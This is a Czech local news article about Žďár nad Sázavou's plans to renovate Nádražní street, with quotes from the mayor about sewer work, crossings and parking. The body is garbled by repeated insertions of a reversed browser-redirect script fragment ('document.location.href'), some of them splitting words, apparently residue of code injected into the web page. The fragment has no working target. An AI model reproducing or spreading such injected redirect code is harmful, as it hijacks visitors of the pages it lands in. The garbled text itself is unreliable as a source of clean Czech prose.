Rainbow page separator

Po náměstí se plánuje obnova Nádražní ulice

Neděle, 22. února 2015

Pohled na Žďár nad Sázavou

Žďár nad Sázavou / V revitalizaci širšího centra města, respektive Nádražní ulice od náměstí až k nádraží, chce pokračovat vedení žďárské radnice. Nejdříve má přijít na řadu příprava projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové dokumentace části ulice ve směru od pošty ke kruhovému objezdu.
„V [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to úseku se bude opravovat kanalizace, takže by bylo vhodné, abychom nechali zrekonstruovat i povrchy ulice,“ uvedl žďárský starosta Zdeněk Navrátil.
Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos chce radnice získat návrh, který by budoucí vzhled Nádražní ulice vyřešil jako na sebe navazující celek, i když se úpravy plánují po etapách. „Přibližně do konce prázdnin chceme sbírat nápady, jak by ulice měla v budoucnu vypadat, například i od majitelů tamních domů. V úseku od pošty ke kruhovému objezdu by měla určitě přibýt bezpečná místa pro přecházení chodců či parkovací zálivy,“ uvedl starosta.
Pěší zónu, s jejíž úpravou se počítá v druhé fázi revitalizace Nádražní ulice, by zase mohly zpestřit předzahrádky restaurací a další možnosti posezení pro chodce.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: http://hdwebky.cz/